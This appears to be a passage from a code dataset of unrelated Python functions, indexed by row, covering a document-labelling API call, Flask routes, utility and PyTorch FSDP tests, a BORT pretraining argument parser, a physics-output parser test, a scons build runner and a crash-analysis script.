len(values) > 0: print(", ".join(values)) values = [""] * len(columns) if len(values) > 0: print(", ".join(values))
23,986
def create_label(project_id: int, label_name: str, templates: list, session=konfuzio_session()) -> List[dict]: """ Create a Label and associate it with templates. If no templates are specified, the label is associated with the first default template of the project. :param project_id: Project ID where to create the label :param label_name: Name for the label :param templates: Templates that use the label :param session: Session to connect to the server :return: Label ID in the Konfuzio APP. """ url = get_create_label_url() if len(templates) == 0: prj_templates = get_project_templates() default_template = [t for t in prj_templates if t['is_default']][0] templates_ids = [default_template['id']] else: templates_ids = [template.id for template in templates] data = {"project": project_id, "text": label_name, "templates": templates_ids} r = session.post(url=url, data=data) assert r.status_code == requests.codes.created, f'Status of request: {r}' label_id = r.json()['id'] return label_id
23,987
def home(): """ Home page """ return render_template("index.html")
23,988
def test_all(): """ #### python test.py test_utils """ def test_logs(): from utilmy.utils import log,log2, logw, loge, logger_setup print("testing logs utils........") logger_setup() log("simple log ") log2("debug log") logw("warning log") loge("error log") def config_load_test(): from utilmy.utils import config_load config_load() def dataset_download_test(): from utilmy.utils import dataset_donwload dataset_donwload("https://github.com/arita37/mnist_png/raw/master/mnist_png.tar.gz", './testdata/tmp/test/dataset/') def os_extract_archive_test(): from utilmy.utils import os_extract_archive os_extract_archive("./testdata/tmp/test/dataset/mnist_png.tar.gz","./testdata/tmp/test/dataset/archive/", archive_format = "auto") def to_file_test(): from utilmy.utils import to_file to_file("to_file_test_str", "./testdata/tmp/test/to_file.txt") test_logs() config_load_test() dataset_download_test() os_extract_archive_test() to_file_test()
23,989
def get_argparser(): """Argument parser""" parser = argparse.ArgumentParser(description='Bort pretraining example.') parser.add_argument('--num_steps', type=int, default=20, help='Number of optimization steps') parser.add_argument('--num_eval_steps', type=int, default=None, help='Number of eval steps') parser.add_argument('--num_buckets', type=int, default=10, help='Number of buckets for variable length sequence sampling') parser.add_argument('--dtype', type=str, default='float16', help='data dtype') parser.add_argument('--batch_size', type=int, default=8, help='Batch size per GPU.') parser.add_argument('--accumulate', type=int, default=1, help='Number of batches for gradient accumulation. ' 'The effective batch size = batch_size * accumulate.') parser.add_argument('--use_avg_len', action='store_true', help='Use average length information for the bucket sampler. ' 'The batch size is approximately the number of tokens in the batch') parser.add_argument('--batch_size_eval', type=int, default=8, help='Batch size per GPU for evaluation.') parser.add_argument('--dataset_name', type=str, default='book_corpus_wiki_en_uncased', choices=['book_corpus_wiki_en_uncased', 'book_corpus_wiki_en_cased', 'wiki_multilingual_uncased', 'wiki_multilingual_cased', 'wiki_cn_cased', 'openwebtext_ccnews_stories_books_cased'], help='The pre-defined dataset from which the vocabulary is created. ' 'Default is book_corpus_wiki_en_uncased.') parser.add_argument('--pretrained', action='store_true', help='Load the pretrained model released by Google.') parser.add_argument('--model', type=str, default='bort_4_8_768_1024', choices=[b for b in bort.predefined_borts.keys()], help='Model to run pre-training on. ') parser.add_argument('--teacher_model', type=str, default='roberta_24_1024_16', help='Model to run as teacher on. ' 'Options are bert_12_768_12, bert_24_1024_16, roberta_24_1024_16, roberta_12_768_12, ' 'others on https://gluon-nlp.mxnet.io/model_zoo/bert/index.html') parser.add_argument('--teacher_ckpt_dir', type=str, default=None, help='Path to teacher checkpoint directory') parser.add_argument('--teacher_ce_weight', type=float, default=0.0, help='weight to mix teacher_ce_loss with ' 'mlm_loss: should be in range (0,1)') parser.add_argument('--distillation_temperature', type=float, default=1.0, help='temperature for teacher/student ' 'distillation') parser.add_argument('--mlm_weight', type=float, default=1.0, help='weight to mix teacher_ce_loss with mlm_loss: ' 'should be in range (0,1)') parser.add_argument('--data', type=str, default=None, help='Path to training data. Training is skipped if not set.') parser.add_argument('--data_eval', type=str, required=True, help='Path to evaluation data. Evaluation is skipped if not set.') parser.add_argument('--ckpt_dir', type=str, default='./ckpt_dir', help='Path to checkpoint directory') parser.add_argument('--start_step', type=int, default=0, help='Start optimization step from the checkpoint.') parser.add_argument('--lr', type=float, default=1e-4, help='Learning rate') parser.add_argument('--warmup_ratio', type=float, default=0.01, help='ratio of warmup steps used in NOAM\'s stepsize schedule') parser.add_argument('--log_interval', type=int, default=250, help='Report interval') parser.add_argument('--ckpt_interval', type=int, default=1000, help='Checkpoint interval') parser.add_argument('--verbose', action='store_true', help='verbose logging') parser.add_argument('--profile', type=str, default=None, help='output profiling result to the target file') parser.add_argument('--cpu_only', action='store_true', help='force to only use cpu') return parser
23,990
def get_from_parameterdata_or_dict(params,key,**kwargs): """ Get the value corresponding to a key from an object that can be either a ParameterData or a dictionary. :param params: a dict or a ParameterData object :param key: a key :param default: a default value. If not present, and if key is not present in params, a KeyError is raised, as in params[key] :return: the corresponding value """ if isinstance(params,ParameterData): params = params.get_dict() if 'default' in kwargs: return params.get(key,kwargs['default']) else: return params[key]
23,991
def notice(callingObject, noticeString): """Prints a formatted notice in the terminal window that includes the name of the source. callingObject -- the instance object making the call noticeString -- the message to be printed For now this function just prints to the terminal, but eventually it could publish to a browser-based interface etc... """ print("[" + objectIdentifier(callingObject) + "] " + str(noticeString))
23,992
def test_simple(): """ Test that a simple EIGENVAL from AFLOW can parse ref: http://aflowlib.duke.edu/AFLOWDATA/LIB1_RAW/B_s:GGA:01Apr2000/A2/ """ lines = """ 1 1 1 1 0.6187200E+01 0.2003113E-09 0.2003113E-09 0.2003113E-09 0.5000000E-15 1.000000000000000E-004 CAR B_s.A2 128 768 6 0.0000000e+00 0.0000000e+00 0.0000000e+00 1.3020830e-03 1 -7.71880 2 26.05280 3 26.05280 4 26.05430 5 44.93560 6 44.93560 """.split("\n") parser = EigenvalParser() results = list([x for x in parser.parse(lines) if len(x) > 0]) # Test k-point info assert len(results) == 1, "Expected one k-point" assert all(abs(x) < 1.0e-9 for x in results[0]['kpoint']), "First k-point should be zero" # Test weights assert results[0]['weight'] == 1.3020830e-03 # Test energies assert len(results[0]['energies'][2]) == 1, "Expected a single spin" assert results[0]['energies'][2][0] == 26.05280, "Band energy was parsed incorrectly" # Test occupancies assert all("occupancies" not in x for x in results), "Shouldn't parse occupancies"
23,993
def test_input_type(temp_files, fsdp_config, input_cls): """Test FSDP with input being a list or a dict, only single GPU.""" if torch_version() < (1, 7, 0): # This test runs multiple test cases in a single process. On 1.6.0 it # throw an error like this: # RuntimeError: Container is already initialized! Cannot initialize it twice! pytest.skip("older pytorch doesn't work well with single process dist_init multiple times") result = dist_init(rank=0, world_size=1, filename=temp_files[0], filename_rpc=temp_files[1]) assert result, "Dist init failed" assert isinstance(fsdp_config, dict), str(fsdp_config) class Model(Module): def __init__(self): super().__init__() self.layer = Linear(4, 4) def forward(self, input): if isinstance(input, list): input = input[0] else: assert isinstance(input, dict), input input = input["in"] return self.layer(input) model = FSDP(Model(), **fsdp_config).cuda() optim = SGD(model.parameters(), lr=0.1) for _ in range(5): in_data = torch.rand(64, 4).cuda() in_data.requires_grad = True if input_cls is list: in_data = [in_data] else: assert input_cls is dict in_data = {"in": in_data} out = model(in_data) out.sum().backward() optim.step() optim.zero_grad() model.assert_state(TrainingState.IDLE) teardown()
23,994
def call_scons(build_options, scons_options): """ Format and run a single scons command. Args: build_options (dict): build flags with values. scons_options (str): additional flags to scons. """ cmd_line = "scons VERBOSE=" + VERBOSE for key in build_options: cmd_line += " " + key + "=" + str(build_options[key]) cmd_line += " " + str(scons_options) if not EXEC_MODE: print ("Would run : " + cmd_line) else: print ("Running : " + cmd_line) sys.stdout.flush() exit_code = subprocess.Popen(cmd_line, shell=True).wait() if exit_code != 0: sys.exit(exit_code)
23,995
def get_heroesplayed_players(matchs_data, team_longname): """Returns a dict linking each player to - the heroes he/she played - if it was a win (1) or a loss (0) """ picks = get_picks(matchs_data, team_longname) players = get_players(picks) results = get_results(matchs_data, team_longname) heroes_played = {item: [[], []] for item in players} for pl in players: i = 0 for rd in picks: if pl in rd.keys(): heroes_played[pl][0].append(rd[pl]) if results[i] == 1: heroes_played[pl][1].append(1) else: heroes_played[pl][1].append(0) i += 1 return heroes_played
23,996
def autofmt(filename, validfmts, defaultfmt=None): """Infer the format of a file from its filename. As a convention all the format to be forced with prefix followed by a colon (e.g. "fmt:filename"). `validfmts` is a list of acceptable file formats `defaultfmt` is the format to use if the extension is not on the valid list returns `filename`,`fmt` """ colonix = filename.find(":") if colonix != -1: extension = filename[:colonix] filename = filename[(colonix+1):] else: extension = None for validfmt in validfmts: if filename.endswith(validfmt): extension = filename[-len(validfmt):] return filename, (extension.lower() if extension in validfmts else defaultfmt)
23,997
def RunPredator(): """Runs delta testing between 2 different Findit versions.""" argparser = argparse.ArgumentParser( description='Run Predator on a batch of crashes.') argparser.add_argument( '--input-path', dest='input_path', default=None, help='Path to read a list of ``CrashAnalysis`` entities') argparser.add_argument( '--result-path', dest='result_path', default=None, help='Path to store results') argparser.add_argument( '--key', '-k', default=None, help='Key to one single crash.') argparser.add_argument( '--client', '-c', default='cracas', help=('Type of client data the delta test is running on, ' 'possible values are: fracas, cracas, clusterfuzz. ' 'Right now, only fracas data is available')) argparser.add_argument( '--app', '-a', default=os.getenv('APP_ID', 'predator-for-me-staging'), help=('App id of the App engine app that query needs to access. ' 'Defualts to predator-for-me-staging. You can also set enviroment ' 'variable by \'export APP_ID=your-app-id\' to replace ' 'the default value.\nNOTE, only appspot app ids are supported, ' 'the app_id of googleplex app will have access issues ' 'due to internal proxy. ')) argparser.add_argument( '--verbose', '-v', action='store_true', default=False, help='Print Predator results.') args = argparser.parse_args() if args.input_path: with open(args.input_path) as f: crashes = pickle.loads(zlib.decompress(f.read())) elif args.key: remote_api.EnableRemoteApi(app_id=args.app) crashes = {args.key: ndb.Key(urlsafe=args.key).get()} if not crashes: logging.error('Failed to get crashes info.') return culprits = GetCulprits(crashes, args.client, args.app, args.verbose) if args.result_path: script_util.FlushResult(culprits, args.result_path)
23,998
def get_or_add_dukaan(): """ Add a new business """ if request.method == "POST": payload = request.json # payload = change_case(payload, "lower") business = db.dukaans.find_one({"name": payload["name"]}) if business is not None: return ( jsonify( { "success": False, "message": "Business name already exists, Please choose another name.", } ), 400, ) for required_key in business_schema: if required_key not in payload.keys(): return jsonify({"message": f"Missing {required_key} parameter"}), 400 db.dukaans.insert_one(payload) return jsonify({"success": True, "dukaan": clean_dict_helper(payload)}), 201 dukaans = list(db.dukaans.find({}).limit(5)) for dukaan in dukaans: if len(dukaan.get("categories", [])) > 0: dukaan["categories"] = [ db.categories.find_one({"_id": ObjectId(_id)})["name"] for _id in dukaan["categories"] ] ratings = list(db.ratings.find({"business": str(dukaan["_id"])}, {"rating": 1})) if len(ratings) > 0: ratings_sum = sum([r["rating"] for r in ratings]) dukaan["avg_rating"] = float(ratings_sum) / float(len(ratings)) else: dukaan["avg_rating"] = 0.0 return jsonify({"success": True, "dukaans": clean_dict_helper(dukaans)})
23,999